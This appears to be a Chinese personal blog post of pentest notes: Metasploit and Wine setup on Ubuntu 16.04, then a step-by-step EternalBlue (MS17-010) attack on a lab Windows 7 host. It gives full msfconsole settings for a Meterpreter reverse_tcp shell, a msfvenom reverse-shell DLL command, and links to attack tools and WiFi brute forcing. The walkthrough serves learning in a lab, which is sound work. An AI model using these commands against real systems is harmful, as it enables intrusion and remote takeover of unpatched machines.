Ubuntu 16.04安装Metasploit

1.安装msf
打开终端,切换到root用户

cd /opt
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
vim msfinstall   #找到apt install -y --force-yes,把--force-yes删掉。
chmod 755 msfinstall
./msfinstall

等它自动安装完毕,然后先不要启动,目前最新版的这个msf会问你要不要用自带到database,你想用自带到数据库就回车,想用自己到数据库就输入no回车

2.安装数据库

apt-get install postgresql  
su - postgres                      
psql
alter user postgres with password 'new password';   #修改密码
\q

3.安装pgadmin,方便管理

apt-get install phppgadmin
# 会自动安装好apache2和php

登录页面应该就可以浏览了http://127.0.0.1/phppgadmin/
账户是:postgres 密码是你设置的密码。

失败次数太多限制登陆

vim /etc/phppgadmin/config.inc.php

# 找到$conf['extra_login_security'] = true;    #改成false即可。

4.启动Metasploit
切换到普通用户

msfconsole
y                 # 输入y连接postgresql数据库
                  # 一会儿之后就进入msf了
db_status         #检查数据库连接状态

Ubuntu 16.04安装、卸载Wine

安装wine

如果是64位系统则需要添加32位支持:

sudo dpkg --add-architecture i386 
# 添加wine最新的源
sudo add-apt-repository ppa:wine/wine-builds
sudo apt-get update
sudo apt-get install --install-recommends winehq-devel
# 安装完成后运行以下命令,会弹出窗口,安装插件。
wine cmd.exe

卸载wine

# 卸载wine主程序,在终端里输入:
sudo apt-get remove --purge wine
# 然后删除wine的目录文件:
rm -r ~/.wine
# 卸载残留不用的软件包:
sudo apt-get autoremove

Msf利用永恒之蓝模块

攻击机器 Ubuntu 16.04:192.168.0.205
靶机 win7 x64: 192.168.0.250

使用自定义的永恒之蓝模块

先安装wine;切换到你运行msf的账户,执行wine cmd.exe安装插件。

接下来安装模块

cd ~
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit
# 拷贝模块到你msf的安装目录下
cp -r deps/ eternalblue_doublepulsar.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
cd /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
vim eternalblue_doublepulsar.rb
# 修改你的模块所在位置


修改好后,运行msf

msfcodsole
reload_all           #重新加载全部文件
search eternalblue   #搜索永恒之蓝模块
use exploit/windows/smb/eternalblue_doublepulsar    #使用模块


set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE  x64                        #设定系统位数
set rhost  192.168.0.250                           #设置被攻击IP
set payload windows/x64/meterpreter/reverse_tcp    #入侵成功后建立主动连接
set lhost 192.168.0.205
show options
# 基本设置好了,开始攻击
exploit

注意:

# 还可以设置DOUBLEPULSARPATH、ETERNALBLUEPATH、端口等等。

show targets    # 显示受影响的操作系统
set target 8    # 设置操作系统为列表中的第9个

# msfvenom是一个强大的命令,输出文件可以多种类型,帮助:msfvenom -h
# 如果权限不足,无法生成eternal11.dll,可自己指定位置生成,注意设置x86还是x64
msfvenom -p windows/meterpreter/reverse_tcp -e x64 lhost=192.168.0.205 lport=4444 -f dll -o /home/leo/.wine/drive_c/eternal11.dll

参考:
http://www.cnblogs.com/backlion/p/6804863.html
https://www.i0day.com/1173.html
https://wenku.baidu.com/view/6ce8e8cf27fff705cc1755270722192e453658b9.html


使用自带的永恒之蓝模块

Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.0.250
msf exploit(ms17_010_eternalblue) >set lhost 192.168.0.205
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
# 入侵成功
Meterpreter> sysinfo

利用树莓派实现P4wnP1项目进行渗透测试

https://www.freebuf.com/geek/195631.html


美国国家安全局软件逆向工程框架 Ghidra

官网(需要梯子):https://ghidra-sre.org
https://github.com/NationalSecurityAgency/ghidra


AutoRDPwn

功能强大的隐蔽型渗透框架;AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击。这个漏洞允许远程攻击者在用户毫不知情的情况下查看用户的桌面,甚至还可以通过恶意请求来实现桌面的远程控制。

https://www.freebuf.com/sectool/198684.html
github:https://github.com/JoelGMSec/AutoRDPwn


CommandoVM

火眼推出Windows免费渗透测试套件,包含140多款工具:https://mp.weixin.qq.com/s/Lm2E4ZJq_hTE-ST39b-Xug


破解wifi密码

用Python暴力破解wifi密码:https://mp.weixin.qq.com/s/MigQeHjI9HkULuZhgtpKew

文章作者: Leo
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 LeoLan的小站
安全 安全
喜欢就支持一下吧